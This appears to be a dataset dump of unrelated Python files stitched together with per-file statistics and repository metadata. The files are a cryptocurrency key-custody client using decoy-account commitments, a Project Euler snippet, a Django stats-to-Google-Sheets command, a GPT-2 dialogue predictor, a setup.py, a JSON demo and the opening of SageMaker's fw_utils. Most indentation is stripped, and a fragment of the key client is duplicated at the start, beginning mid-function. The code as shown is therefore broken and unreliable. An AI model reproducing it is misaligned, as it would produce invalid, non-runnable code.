key = session.query(Key).filter(Key.key_uuid == key_currency_account.key_uuid).one()
LOGGER.info("Assigning existing key(%s) to account(%s)", key.key_uuid, account.uuid)
self._add_key_and_decoy_accounts(session, key, account)
session.commit()
return key_uuid
            # if we get here, none of the keys we tried worked. Let's create a new one.
with self._sessionmaker() as session:
account = (
session.query(Account)
.filter(
Account.uuid == account_uuid,
)
.one()
)
private_key = SECP256K1_ORDER.random()
key = self._add_new_hot_key(session, private_key)
key_currency_account = (
session.query(KeyCurrencyAccount)
.filter(
KeyCurrencyAccount.key_uuid == key.key_uuid,
KeyCurrencyAccount.currency == account.currency,
KeyCurrencyAccount.account_uuid == ADMIN_UUID,
KeyCurrencyAccount.pending_admin_deposits == 0,
)
.populate_existing()
.with_for_update()
.one()
)
key_currency_account.account_uuid = account_uuid
key_currency_account.pending_admin_deposits = int(account_uuid == ADMIN_UUID)
LOGGER.info("Assigning new key(%s) to account(%s)", key.key_uuid, account.uuid)
self._add_key_and_decoy_accounts(session, key, account)
key_uuid = key.key_uuid
assert isinstance(key_uuid, uuid.UUID)
session.commit()
return key_uuid
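    # Register a cold-storage key from material generated offline: the public key, the
    # permuted private key, and the permutation NIZK are stored as provided.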
def add_cold_key(
self,
key_uuid: uuid.UUID,
public_key: petlib.ec.EcPt,
permuted_private_key: petlib.bn.Bn,
nizk: NIZK,
ethereum_transaction_count: int = 0,
) -> None:
key = Key(
key_uuid=key_uuid,
secp256k1_public_key=public_key,
key_type=KeyType.COLD,
permuted_private_key=permuted_private_key,
permutation_nizk=nizk,
ethereum_transaction_count=ethereum_transaction_count,
)
with self._sessionmaker() as session:
session.add(key)
self._add_blockchain_addresses(session, key)
self._track_owned_key(session, key)
session.commit()
def add_anonymous_key(self, public_key: petlib.ec.EcPt) -> uuid.UUID:
k = SECP256K1_ORDER.random()
permuted_public_key, nizk = permute_public_key(public_key, k)
key = Key(
key_uuid=generate_uuid4(),
secp256k1_public_key=public_key,
key_type=KeyType.ANONYMOUS,
permuted_secp256k1_public_key=permuted_public_key,
permutation_nizk=nizk,
)
with self._sessionmaker() as session:
session.add(key)
self._add_blockchain_addresses(session, key)
self._track_anonymous_key(session, key)
session.commit()
key_uuid = key.key_uuid
assert isinstance(key_uuid, uuid.UUID)
return key_uuid
@staticmethod
def _track_owned_key(session: Session, key: Key) -> None:
for currency in Currency:
key_currency_account = KeyCurrencyAccount(
key_uuid=key.key_uuid,
currency=currency,
account_uuid=ADMIN_UUID,
available_balance=None,
)
session.add(key_currency_account)
@staticmethod
def _track_anonymous_key(session: Session, key: Key) -> None:
for currency in Currency:
key_currency_account = KeyCurrencyAccount(
key_uuid=key.key_uuid,
currency=currency,
)
session.add(key_currency_account)
def assign_key_as_decoy_to_account(self, *, key_uuid: uuid.UUID, account_uuid: uuid.UUID) -> None:
assert account_uuid != ADMIN_UUID, "cannot assign decoy for admin"
with self._sessionmaker() as session:
key = session.query(Key).filter(Key.key_uuid == key_uuid).one()
self._add_new_key_account_commitment(
session,
key,
account_uuid,
deposits_will_be_credited_to_account_for_key=False,
)
session.commit()
def assign_key_for_deposits_to_account(self, *, key_uuid: uuid.UUID, account_uuid: uuid.UUID) -> None:
assert account_uuid != ADMIN_UUID, "cannot assign back to admin"
with self._sessionmaker() as session:
key = session.query(Key).filter(Key.key_uuid == key_uuid).one()
if not key.ownership_s:
raise ValueError(
"key is not owned and therefore "
"cannot be assigned since we do not know the corresponding private key"
)
account = session.query(Account).filter(Account.uuid == account_uuid).one()
key_currency_account = (
session.query(KeyCurrencyAccount)
.filter(
KeyCurrencyAccount.key_uuid == key_uuid,
KeyCurrencyAccount.currency == account.currency,
KeyCurrencyAccount.account_uuid == ADMIN_UUID,
KeyCurrencyAccount.pending_admin_deposits == 0,
)
.populate_existing()
.with_for_update()
.one()
)
key_currency_account.account_uuid = account_uuid
self._add_new_key_account_commitment(
session,
key=key,
account_uuid=account_uuid,
deposits_will_be_credited_to_account_for_key=True,
)
session.commit()
| 41.787952
| 116
| 0.589897
|
import logging
import secrets
import uuid
from decimal import Decimal
from typing import List, Optional, Sequence
import petlib.ec
import sqlalchemy.orm
from common.constants import ADMIN_UUID, SECP256K1_ORDER, Blockchain, Currency
from common.utils.uuid import generate_uuid4
from common.utils.zk import NIZK
from common.utils.zk.bit_commitment import generate_bit_commitment
from common.utils.zk.key_permutation import permute_private_key, permute_public_key
from protobufs.institution.account_pb2 import KeyType
from sqlalchemy import desc
from sqlalchemy.exc import OperationalError
from sqlalchemy.orm import Session
from sqlalchemy.orm.exc import NoResultFound
from backend.sql.account import Account
from backend.sql.blockchain_address_key import BlockchainAddressKey
from backend.sql.key import Key
from backend.sql.key_account_commitment import KeyAccountCommitment
from backend.sql.key_currency_account import KeyCurrencyAccount
from backend.sql.key_currency_block import KeyCurrencyBlock
LOGGER = logging.getLogger(__name__)
class KeyClient:
def __init__(
self,
sessionmaker: sqlalchemy.orm.sessionmaker,
deposit_key_decoy_set_size: int,
) -> None:
self._sessionmaker = sessionmaker
self._deposit_key_decoy_set_size = deposit_key_decoy_set_size
@staticmethod
def _add_new_key_account_commitment(
session: Session,
key: Key,
account_uuid: uuid.UUID,
deposits_will_be_credited_to_account_for_key: bool,
) -> None:
r = SECP256K1_ORDER.random()
permuted_public_key = key.permuted_secp256k1_public_key
_, bit_commitment_nizk = generate_bit_commitment(
s=deposits_will_be_credited_to_account_for_key, G=permuted_public_key, r=r
)
session.add(
KeyAccountCommitment(
key_uuid=key.key_uuid,
account_uuid=account_uuid,
s=deposits_will_be_credited_to_account_for_key,
r=r,
nizk=bit_commitment_nizk,
)
)
@staticmethod
def _add_blockchain_addresses(session: Session, key: Key) -> None:
for blockchain in Blockchain:
address = key.get_address(blockchain)
session.add(
BlockchainAddressKey(
blockchain=blockchain,
address=address,
key_uuid=key.key_uuid,
)
)
def _add_new_hot_key(self, session: Session, private_key: petlib.bn.Bn) -> Key:
k = SECP256K1_ORDER.random()
permuted_private_key, nizk = permute_private_key(private_key, k)
key = Key(
key_uuid=generate_uuid4(),
key_type=KeyType.HOT,
private_key=private_key,
permuted_private_key=permuted_private_key,
permutation_nizk=nizk,
)
session.add(key)
self._track_owned_key(session, key)
self._add_blockchain_addresses(session, key)
return key
@staticmethod
def get_key_currency_block(
session: Session, key_uuid: uuid.UUID, currency: Currency, block_number: int
) -> KeyCurrencyBlock:
key_currency_block = (
session.query(KeyCurrencyBlock)
.filter(
KeyCurrencyBlock.key_uuid == key_uuid,
KeyCurrencyBlock.currency == currency,
KeyCurrencyBlock.block_number <= block_number,
)
.order_by(desc(KeyCurrencyBlock.block_number))
.first()
)
if key_currency_block is None:
raise ValueError(f"key_uuid({key_uuid}) not found")
return key_currency_block
def get_balance(self, key_uuid: uuid.UUID, currency: Currency, block_number: int) -> Decimal:
with self._sessionmaker() as session:
key_currency = (
session.query(KeyCurrencyAccount)
.filter(
KeyCurrencyAccount.key_uuid == key_uuid,
KeyCurrencyAccount.currency == currency,
)
.one()
)
initial_balance = key_currency.initial_balance
key_currency_block = self.get_key_currency_block(session, key_uuid, currency, block_number)
balance = (
initial_balance
+ key_currency_block.cumulative_tracked_deposit_amount
- key_currency_block.cumulative_tracked_withdrawal_amount
)
assert isinstance(balance, Decimal)
return balance
def find_or_create_admin_key(
self, session: Session, currency: Currency, *, excluded_key_uuids: Sequence[uuid.UUID] = tuple()
) -> Key:
query = session.query(Key).filter(
KeyCurrencyAccount.account_uuid == ADMIN_UUID,
KeyCurrencyAccount.currency == currency,
Key.key_uuid == KeyCurrencyAccount.key_uuid,
Key.key_uuid.notin_(excluded_key_uuids),
)
count = query.count()
key: Optional[Key] = None
if count > 0:
key = query.order_by(Key.created_at).offset(secrets.randbelow(count)).first()
if key is None:
private_key = SECP256K1_ORDER.random()
key = self._add_new_hot_key(session, private_key)
return key
def make_new_hot_key(self) -> uuid.UUID:
with self._sessionmaker() as session:
private_key = SECP256K1_ORDER.random()
key = self._add_new_hot_key(session, private_key)
session.commit()
key_uuid = key.key_uuid
assert isinstance(key_uuid, uuid.UUID)
return key_uuid
def import_hot_key(self, private_key: petlib.bn.Bn, ethereum_transaction_count: int = 0) -> uuid.UUID:
with self._sessionmaker() as session:
key = self._add_new_hot_key(session, private_key)
key.ethereum_transaction_count = ethereum_transaction_count
session.commit()
key_uuid = key.key_uuid
assert isinstance(key_uuid, uuid.UUID)
return key_uuid
def _add_key_and_decoy_accounts(self, session: Session, key: Key, account: Account) -> None:
decoy_account_uuids = [account.uuid]
while len(decoy_account_uuids) < self._deposit_key_decoy_set_size:
query = session.query(Account.uuid).filter(
Account.uuid.notin_(decoy_account_uuids),
Account.account_type == account.account_type,
Account.currency == account.currency,
)
count = query.count()
if count == 0:
break
decoy_accounts = query.order_by(Account.created_at).offset(secrets.randbelow(count)).first()
if decoy_accounts is not None:
(decoy_account_uuid,) = decoy_accounts
decoy_account_uuids.append(decoy_account_uuid)
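# The collected UUIDs are then visited in a random order (swap-with-last, then pop),
# so the commitments below are not inserted in a predictable sequence.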
while len(decoy_account_uuids) > 0:
i = secrets.randbelow(len(decoy_account_uuids))
account_uuid = decoy_account_uuids[i]
decoy_account_uuids[i] = decoy_account_uuids[-1]
decoy_account_uuids.pop()
if account_uuid == account.uuid:
self._add_new_key_account_commitment(
session,
key=key,
account_uuid=account.uuid,
# if account is owned by admin, never credit deposits
deposits_will_be_credited_to_account_for_key=account.user_uuid != ADMIN_UUID,
)
continue
self._add_new_key_account_commitment(
session,
key=key,
account_uuid=account_uuid,
deposits_will_be_credited_to_account_for_key=False,
)
def find_or_create_key_and_assign_to_account(self, account_uuid: uuid.UUID) -> uuid.UUID:
with self._sessionmaker() as session:
account = (
session.query(Account)
.filter(
Account.uuid == account_uuid,
)
.one()
)
currency = account.currency
bad_key_uuids: List[uuid.UUID] = []
for _ in range(5):
with self._sessionmaker() as session:
# select a "candidate" without locking
query = session.query(KeyCurrencyAccount.key_uuid).filter(
KeyCurrencyAccount.account_uuid == ADMIN_UUID,
KeyCurrencyAccount.currency == currency,
KeyCurrencyAccount.pending_admin_deposits == 0,
KeyCurrencyAccount.key_uuid.notin_(bad_key_uuids),
)
count = query.count()
if count == 0:
break
offset = secrets.randbelow(count)
key_uuids = query.order_by(KeyCurrencyAccount.created_at).offset(offset).first()
if key_uuids is None:
break
(key_uuid,) = key_uuids
assert isinstance(key_uuid, uuid.UUID)
# check to see if we are a decoy
already_a_commitment = (
session.query(KeyAccountCommitment)
.filter(
KeyAccountCommitment.key_uuid == key_uuid, KeyAccountCommitment.account_uuid == account_uuid
)
.limit(1)
.count()
> 0
)
if already_a_commitment:
bad_key_uuids.append(key_uuid)
continue
with self._sessionmaker() as session:
# now, attempt to lock the candidate
try:
key_currency_account = (
session.query(KeyCurrencyAccount)
.filter(
KeyCurrencyAccount.key_uuid == key_uuid,
KeyCurrencyAccount.account_uuid == ADMIN_UUID,
KeyCurrencyAccount.currency == currency,
KeyCurrencyAccount.pending_admin_deposits == 0,
)
.populate_existing()
.with_for_update(nowait=True)
.one()
)
except (OperationalError, NoResultFound):
# race condition
continue
account = (
session.query(Account)
.filter(
Account.uuid == account_uuid,
)
.one()
)
key_currency_account.account_uuid = account_uuid
# if the account is the admin account, set pending_admin_deposits to 1
# so this key is permanently locked
key_currency_account.pending_admin_deposits = int(account_uuid == ADMIN_UUID)
key = session.query(Key).filter(Key.key_uuid == key_currency_account.key_uuid).one()
LOGGER.info("Assigning existing key(%s) to account(%s)", key.key_uuid, account.uuid)
self._add_key_and_decoy_accounts(session, key, account)
session.commit()
return key_uuid
# if we get here, none of the candidate keys we tried could be claimed. Create a new key.
with self._sessionmaker() as session:
account = (
session.query(Account)
.filter(
Account.uuid == account_uuid,
)
.one()
)
private_key = SECP256K1_ORDER.random()
key = self._add_new_hot_key(session, private_key)
key_currency_account = (
session.query(KeyCurrencyAccount)
.filter(
KeyCurrencyAccount.key_uuid == key.key_uuid,
KeyCurrencyAccount.currency == account.currency,
KeyCurrencyAccount.account_uuid == ADMIN_UUID,
KeyCurrencyAccount.pending_admin_deposits == 0,
)
.populate_existing()
.with_for_update()
.one()
)
key_currency_account.account_uuid = account_uuid
key_currency_account.pending_admin_deposits = int(account_uuid == ADMIN_UUID)
LOGGER.info("Assigning new key(%s) to account(%s)", key.key_uuid, account.uuid)
self._add_key_and_decoy_accounts(session, key, account)
key_uuid = key.key_uuid
assert isinstance(key_uuid, uuid.UUID)
session.commit()
return key_uuid
def add_cold_key(
self,
key_uuid: uuid.UUID,
public_key: petlib.ec.EcPt,
permuted_private_key: petlib.bn.Bn,
nizk: NIZK,
ethereum_transaction_count: int = 0,
) -> None:
key = Key(
key_uuid=key_uuid,
secp256k1_public_key=public_key,
key_type=KeyType.COLD,
permuted_private_key=permuted_private_key,
permutation_nizk=nizk,
ethereum_transaction_count=ethereum_transaction_count,
)
with self._sessionmaker() as session:
session.add(key)
self._add_blockchain_addresses(session, key)
self._track_owned_key(session, key)
session.commit()
def add_anonymous_key(self, public_key: petlib.ec.EcPt) -> uuid.UUID:
k = SECP256K1_ORDER.random()
permuted_public_key, nizk = permute_public_key(public_key, k)
key = Key(
key_uuid=generate_uuid4(),
secp256k1_public_key=public_key,
key_type=KeyType.ANONYMOUS,
permuted_secp256k1_public_key=permuted_public_key,
permutation_nizk=nizk,
)
with self._sessionmaker() as session:
session.add(key)
self._add_blockchain_addresses(session, key)
self._track_anonymous_key(session, key)
session.commit()
key_uuid = key.key_uuid
assert isinstance(key_uuid, uuid.UUID)
return key_uuid
@staticmethod
def _track_owned_key(session: Session, key: Key) -> None:
for currency in Currency:
key_currency_account = KeyCurrencyAccount(
key_uuid=key.key_uuid,
currency=currency,
account_uuid=ADMIN_UUID,
available_balance=None,
)
session.add(key_currency_account)
@staticmethod
def _track_anonymous_key(session: Session, key: Key) -> None:
for currency in Currency:
key_currency_account = KeyCurrencyAccount(
key_uuid=key.key_uuid,
currency=currency,
)
session.add(key_currency_account)
def assign_key_as_decoy_to_account(self, *, key_uuid: uuid.UUID, account_uuid: uuid.UUID) -> None:
assert account_uuid != ADMIN_UUID, "cannot assign decoy for admin"
with self._sessionmaker() as session:
key = session.query(Key).filter(Key.key_uuid == key_uuid).one()
self._add_new_key_account_commitment(
session,
key,
account_uuid,
deposits_will_be_credited_to_account_for_key=False,
)
session.commit()
def assign_key_for_deposits_to_account(self, *, key_uuid: uuid.UUID, account_uuid: uuid.UUID) -> None:
assert account_uuid != ADMIN_UUID, "cannot assign back to admin"
with self._sessionmaker() as session:
key = session.query(Key).filter(Key.key_uuid == key_uuid).one()
if not key.ownership_s:
raise ValueError(
"key is not owned and therefore "
"cannot be assigned since we do not know the corresponding private key"
)
account = session.query(Account).filter(Account.uuid == account_uuid).one()
key_currency_account = (
session.query(KeyCurrencyAccount)
.filter(
KeyCurrencyAccount.key_uuid == key_uuid,
KeyCurrencyAccount.currency == account.currency,
KeyCurrencyAccount.account_uuid == ADMIN_UUID,
KeyCurrencyAccount.pending_admin_deposits == 0,
)
.populate_existing()
.with_for_update()
.one()
)
key_currency_account.account_uuid = account_uuid
self._add_new_key_account_commitment(
session,
key=key,
account_uuid=account_uuid,
deposits_will_be_credited_to_account_for_key=True,
)
session.commit()
| true
| true
|
1c3e9bc31b47a9334ee2b0d528b713b934e10f10
| 62
|
py
|
Python
|
Python_Code/PRs/num01_Natarajan_Lalgudi.py
|
abhiramr/ProjectEuler-Abhi
|
c86a964e5b2dbf79bc494d7d7d28ce7807504cd3
|
[
"MIT"
] | 2
|
2019-10-20T12:09:10.000Z
|
2021-02-13T05:51:08.000Z
|
Python_Code/PRs/num01_Natarajan_Lalgudi.py
|
abhiramr/ProjectEuler_Solutions
|
c86a964e5b2dbf79bc494d7d7d28ce7807504cd3
|
[
"MIT"
] | 1
|
2019-10-20T03:26:55.000Z
|
2019-10-20T03:26:55.000Z
|
Python_Code/PRs/num01_Natarajan_Lalgudi.py
|
abhiramr/ProjectEuler-Abhi
|
c86a964e5b2dbf79bc494d7d7d28ce7807504cd3
|
[
"MIT"
] | 9
|
2019-10-20T05:47:02.000Z
|
2019-10-20T06:06:03.000Z
|
lst = [x for x in range(1000) if (x%3==0 or x%5==0)]
sum(lst)
| 20.666667
| 52
| 0.564516
|
lst = [x for x in range(1000) if (x%3==0 or x%5==0)]
sum(lst)
| true
| true
|
1c3e9cb2bbe6ea1bde1164fb502cb7f3dd4932b0
| 2,290
|
py
|
Python
|
src/moderations/management/commands/send_stats_to_gspread.py
|
definitelysecure/shipwrecked
|
3b79c6df63ed3c271ccb1b8a21081c76bcd9f08a
|
[
"MIT"
] | null | null | null |
src/moderations/management/commands/send_stats_to_gspread.py
|
definitelysecure/shipwrecked
|
3b79c6df63ed3c271ccb1b8a21081c76bcd9f08a
|
[
"MIT"
] | null | null | null |
src/moderations/management/commands/send_stats_to_gspread.py
|
definitelysecure/shipwrecked
|
3b79c6df63ed3c271ccb1b8a21081c76bcd9f08a
|
[
"MIT"
] | null | null | null |
import gspread
from oauth2client.service_account import ServiceAccountCredentials
from oauth2client import crypt
from django.core.management.base import BaseCommand
from django.utils import timezone
from moderation.settings import GOOGLE_DOCS_API_PRIVATE_KEY, GOOGLE_DOCS_API_SERVICE_ACCOUNT_EMAIL
from moderations.stats import get_leaderboard
from moderations.utils import timedelta_to_str
class Command(BaseCommand):
def handle(self, *args, **options):
def get_hour_fraction(timedelta_object):
"""
Convert a timedelta to a fractional number of hours, e.g. 1 hour and 60 seconds is ~1.017 hours.
"""
hours = timedelta_object.days * 24
seconds = timedelta_object.seconds
fraction_of_hour = seconds / 3600.0
return hours + fraction_of_hour
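# Illustrative behaviour (comments added for clarity, not in the original command),
# assuming standard datetime.timedelta inputs:
#   get_hour_fraction(timedelta(hours=1, seconds=60))   -> ~1.0167
#   get_hour_fraction(timedelta(days=1, seconds=1800))  -> 24.5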
leaderboard = get_leaderboard()
avg_time_first_mod_rev_all = get_hour_fraction(leaderboard['avg']['all_time']['review'][0])
avg_time_first_mod_rev_week = get_hour_fraction(leaderboard['avg']['seven_days']['review'][0])
avg_time_mod_res_all = get_hour_fraction(leaderboard['avg']['all_time']['resolution'][0])
avg_time_mod_res_week = get_hour_fraction(leaderboard['avg']['seven_days']['resolution'][0])
signer = crypt.Signer.from_string(GOOGLE_DOCS_API_PRIVATE_KEY)
scope = ['https://spreadsheets.google.com/feeds']
creds = ServiceAccountCredentials(GOOGLE_DOCS_API_SERVICE_ACCOUNT_EMAIL, signer, scopes=scope,
private_key_id=None, client_id=None, user_agent=None,
token_uri='https://www.googleapis.com/oauth2/v4/token',
revoke_uri='https://accounts.google.com/o/oauth2/revoke')
client = gspread.authorize(creds)
sheet = client.open('cv-mod-stats').sheet1
# The values to append, in the column order expected by the sheet
timestamp = timezone.now().strftime('%Y-%m-%d')
values = (timestamp,
avg_time_first_mod_rev_week, avg_time_first_mod_rev_all,
avg_time_mod_res_week, avg_time_mod_res_all)
# Insert at index 2 (index 1 is the header)
sheet.insert_row(values, 2)
| 44.901961
| 102
| 0.672926
|
import gspread
from oauth2client.service_account import ServiceAccountCredentials
from oauth2client import crypt
from django.core.management.base import BaseCommand
from django.utils import timezone
from moderation.settings import GOOGLE_DOCS_API_PRIVATE_KEY, GOOGLE_DOCS_API_SERVICE_ACCOUNT_EMAIL
from moderations.stats import get_leaderboard
from moderations.utils import timedelta_to_str
class Command(BaseCommand):
def handle(self, *args, **options):
def get_hour_fraction(timedelta_object):
hours = timedelta_object.days * 24
seconds = timedelta_object.seconds
fraction_of_hour = seconds / 3600.0
return hours + fraction_of_hour
leaderboard = get_leaderboard()
avg_time_first_mod_rev_all = get_hour_fraction(leaderboard['avg']['all_time']['review'][0])
avg_time_first_mod_rev_week = get_hour_fraction(leaderboard['avg']['seven_days']['review'][0])
avg_time_mod_res_all = get_hour_fraction(leaderboard['avg']['all_time']['resolution'][0])
avg_time_mod_res_week = get_hour_fraction(leaderboard['avg']['seven_days']['resolution'][0])
signer = crypt.Signer.from_string(GOOGLE_DOCS_API_PRIVATE_KEY)
scope = ['https://spreadsheets.google.com/feeds']
creds = ServiceAccountCredentials(GOOGLE_DOCS_API_SERVICE_ACCOUNT_EMAIL, signer, scopes=scope,
private_key_id=None, client_id=None, user_agent=None,
token_uri='https://www.googleapis.com/oauth2/v4/token',
revoke_uri='https://accounts.google.com/o/oauth2/revoke')
client = gspread.authorize(creds)
sheet = client.open('cv-mod-stats').sheet1
timestamp = timezone.now().strftime('%Y-%m-%d')
values = (timestamp,
avg_time_first_mod_rev_week, avg_time_first_mod_rev_all,
avg_time_mod_res_week, avg_time_mod_res_all)
sheet.insert_row(values, 2)
| true
| true
|
1c3e9e2510a719d6ad1d93fce4df6c7e85a8f21a
| 906
|
py
|
Python
|
examples/pytorch/answer-generator/predictor.py
|
SSITB/cortex
|
cb9b64d466fedaceb1cb9171914ffb31409927fe
|
[
"Apache-2.0"
] | 1
|
2019-11-25T05:47:35.000Z
|
2019-11-25T05:47:35.000Z
|
examples/pytorch/answer-generator/predictor.py
|
SSITB/cortex
|
cb9b64d466fedaceb1cb9171914ffb31409927fe
|
[
"Apache-2.0"
] | null | null | null |
examples/pytorch/answer-generator/predictor.py
|
SSITB/cortex
|
cb9b64d466fedaceb1cb9171914ffb31409927fe
|
[
"Apache-2.0"
] | null | null | null |
import wget
import torch
from transformers import GPT2Tokenizer, GPT2LMHeadModel, GPT2Config
import generator
medium_config = GPT2Config(n_embd=1024, n_layer=24, n_head=16)
model = GPT2LMHeadModel(medium_config)
tokenizer = GPT2Tokenizer.from_pretrained("gpt2")
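# Note (added for clarity, not in the original example): "medium_ft.pkl" appears to be
# Microsoft's DialoGPT-medium fine-tuned checkpoint; init() below remaps its
# "lm_head.decoder.weight" entry to the "lm_head.weight" name expected by transformers'
# GPT2LMHeadModel before loading the state dict.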
def init(model_path, metadata):
wget.download(
"https://convaisharables.blob.core.windows.net/lsp/multiref/medium_ft.pkl", "medium_ft.pkl"
)
weights = torch.load("medium_ft.pkl")
weights["lm_head.weight"] = weights["lm_head.decoder.weight"]
weights.pop("lm_head.decoder.weight", None)
model.load_state_dict(weights)
model.eval()
model.to(metadata["device"])
def predict(sample, metadata):
conditioned_tokens = tokenizer.encode(sample["text"]) + [generator.END_OF_TEXT]
prediction = generator.generate(model, conditioned_tokens, metadata["device"])
return tokenizer.decode(prediction)
| 30.2
| 99
| 0.748344
|
import wget
import torch
from transformers import GPT2Tokenizer, GPT2LMHeadModel, GPT2Config
import generator
medium_config = GPT2Config(n_embd=1024, n_layer=24, n_head=16)
model = GPT2LMHeadModel(medium_config)
tokenizer = GPT2Tokenizer.from_pretrained("gpt2")
def init(model_path, metadata):
wget.download(
"https://convaisharables.blob.core.windows.net/lsp/multiref/medium_ft.pkl", "medium_ft.pkl"
)
weights = torch.load("medium_ft.pkl")
weights["lm_head.weight"] = weights["lm_head.decoder.weight"]
weights.pop("lm_head.decoder.weight", None)
model.load_state_dict(weights)
model.eval()
model.to(metadata["device"])
def predict(sample, metadata):
conditioned_tokens = tokenizer.encode(sample["text"]) + [generator.END_OF_TEXT]
prediction = generator.generate(model, conditioned_tokens, metadata["device"])
return tokenizer.decode(prediction)
| true
| true
|
1c3e9e2c60ee00b4900a5d98d0339667c62cd6c3
| 1,165
|
py
|
Python
|
test/vanilla/version-tolerant/Expected/AcceptanceTests/BodyFormDataVersionTolerant/setup.py
|
cfculhane/autorest.python
|
8cbca95faee88d933a58bbbd17b76834faa8d387
|
[
"MIT"
] | null | null | null |
test/vanilla/version-tolerant/Expected/AcceptanceTests/BodyFormDataVersionTolerant/setup.py
|
cfculhane/autorest.python
|
8cbca95faee88d933a58bbbd17b76834faa8d387
|
[
"MIT"
] | null | null | null |
test/vanilla/version-tolerant/Expected/AcceptanceTests/BodyFormDataVersionTolerant/setup.py
|
cfculhane/autorest.python
|
8cbca95faee88d933a58bbbd17b76834faa8d387
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
# coding: utf-8
from setuptools import setup, find_packages
NAME = "autorestswaggerbatformdataservice"
VERSION = "0.1.0"
# To install the library, run the following
#
# python setup.py install
#
# prerequisite: setuptools
# http://pypi.python.org/pypi/setuptools
REQUIRES = ["msrest>=0.6.21", "azure-core<2.0.0,>=1.20.0"]
setup(
name=NAME,
version=VERSION,
description="AutoRestSwaggerBATFormDataService",
author_email="",
url="",
keywords=["Swagger", "AutoRestSwaggerBATFormDataService"],
install_requires=REQUIRES,
packages=find_packages(),
include_package_data=True,
long_description="""\
Test Infrastructure for AutoRest Swagger BAT.
""",
)
| 30.657895
| 94
| 0.635193
|
from setuptools import setup, find_packages
NAME = "autorestswaggerbatformdataservice"
VERSION = "0.1.0"
REQUIRES = ["msrest>=0.6.21", "azure-core<2.0.0,>=1.20.0"]
setup(
name=NAME,
version=VERSION,
description="AutoRestSwaggerBATFormDataService",
author_email="",
url="",
keywords=["Swagger", "AutoRestSwaggerBATFormDataService"],
install_requires=REQUIRES,
packages=find_packages(),
include_package_data=True,
long_description="""\
Test Infrastructure for AutoRest Swagger BAT.
""",
)
| true
| true
|
1c3e9fbeb5e1b10666670d451af1d807c912d958
| 419
|
py
|
Python
|
learn_python/json/json_read_write.py
|
Yeasmin-Tasnima/Python
|
eb172450c66bbc69133cd92290c4027cafef579f
|
[
"Apache-2.0"
] | null | null | null |
learn_python/json/json_read_write.py
|
Yeasmin-Tasnima/Python
|
eb172450c66bbc69133cd92290c4027cafef579f
|
[
"Apache-2.0"
] | null | null | null |
learn_python/json/json_read_write.py
|
Yeasmin-Tasnima/Python
|
eb172450c66bbc69133cd92290c4027cafef579f
|
[
"Apache-2.0"
] | null | null | null |
import json
book = {}
book['tom'] = {
'address': 'dhaka',
'phone': 1234
}
book['bob'] = {
'address': 'dinajpur',
'phone': 5678
}
s = json.dumps(book)
# writing
with open('book.txt', 'w') as f:
f.write(s)
# read json file as a string
with open('book.txt', 'r') as f:
    book = f.read()
print(type(book))
print(book)
# read json file as a dictionary
book = json.loads(book)
print(type(book))
print(book)
| 13.516129
| 32
| 0.594272
|
import json
book = {}
book['tom'] = {
'address': 'dhaka',
'phone': 1234
}
book['bob'] = {
'address': 'dinajpur',
'phone': 5678
}
s = json.dumps(book)
with open('book.txt', 'w') as f:
f.write(s)
with open('book.txt', 'r') as f:
    book = f.read()
print(type(book))
print(book)
book = json.loads(book)
print(type(book))
print(book)
| true
| true
|
1c3e9fcb412b8bde1a6852ee7411071417babf41
| 25,595
|
py
|
Python
|
src/sagemaker/fw_utils.py
|
ram-nadella/sagemaker-python-sdk
|
0ed415f96483f29c2c8b7a320bb825a993e116b2
|
[
"Apache-2.0"
] | 1
|
2020-11-20T14:48:24.000Z
|
2020-11-20T14:48:24.000Z
|
src/sagemaker/fw_utils.py
|
ram-nadella/sagemaker-python-sdk
|
0ed415f96483f29c2c8b7a320bb825a993e116b2
|
[
"Apache-2.0"
] | null | null | null |
src/sagemaker/fw_utils.py
|
ram-nadella/sagemaker-python-sdk
|
0ed415f96483f29c2c8b7a320bb825a993e116b2
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017-2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
"""Utility methods used by framework classes"""
from __future__ import absolute_import
import logging
import os
import re
import shutil
import tempfile
from collections import namedtuple
import sagemaker.utils
from sagemaker import s3
from sagemaker.utils import get_ecr_image_uri_prefix, ECR_URI_PATTERN
logger = logging.getLogger("sagemaker")
_TAR_SOURCE_FILENAME = "source.tar.gz"
UploadedCode = namedtuple("UserCode", ["s3_prefix", "script_name"])
"""sagemaker.fw_utils.UserCode: An object containing the S3 prefix and script name.
This is for the source code used for the entry point with an ``Estimator``. It can be
instantiated with positional or keyword arguments.
"""
EMPTY_FRAMEWORK_VERSION_WARNING = (
"No framework_version specified, defaulting to version {}. "
"framework_version will be required in SageMaker Python SDK v2."
)
LATER_FRAMEWORK_VERSION_WARNING = (
"This is not the latest supported version. "
"If you would like to use version {latest}, "
"please add framework_version={latest} to your constructor."
)
PYTHON_2_DEPRECATION_WARNING = (
"{latest_supported_version} is the latest version of {framework} that supports "
"Python 2. Newer versions of {framework} will only be available for Python 3."
"Please set the argument \"py_version='py3'\" to use the Python 3 {framework} image."
)
PARAMETER_SERVER_MULTI_GPU_WARNING = (
"If you have selected a multi-GPU training instance type, "
"and have also enabled parameter server for distributed training. "
"Distributed training with the default parameter server configuration will not "
"fully leverage all GPU cores; the parameter server will be configured to run "
"only one worker per host regardless of the number of GPUs."
)
PARAMETER_V2_RENAME_WARNING = (
"Parameter {v1_parameter_name} will be renamed to {v2_parameter_name} "
"in SageMaker Python SDK v2."
)
EMPTY_FRAMEWORK_VERSION_ERROR = (
"framework_version is required for script mode estimator. "
"Please add framework_version={} to your constructor to avoid this error."
)
UNSUPPORTED_FRAMEWORK_VERSION_ERROR = (
"{} framework does not support version {}. Please use one of the following: {}."
)
VALID_PY_VERSIONS = ["py2", "py3", "py37"]
VALID_EIA_FRAMEWORKS = [
"tensorflow",
"tensorflow-serving",
"mxnet",
"mxnet-serving",
"pytorch-serving",
]
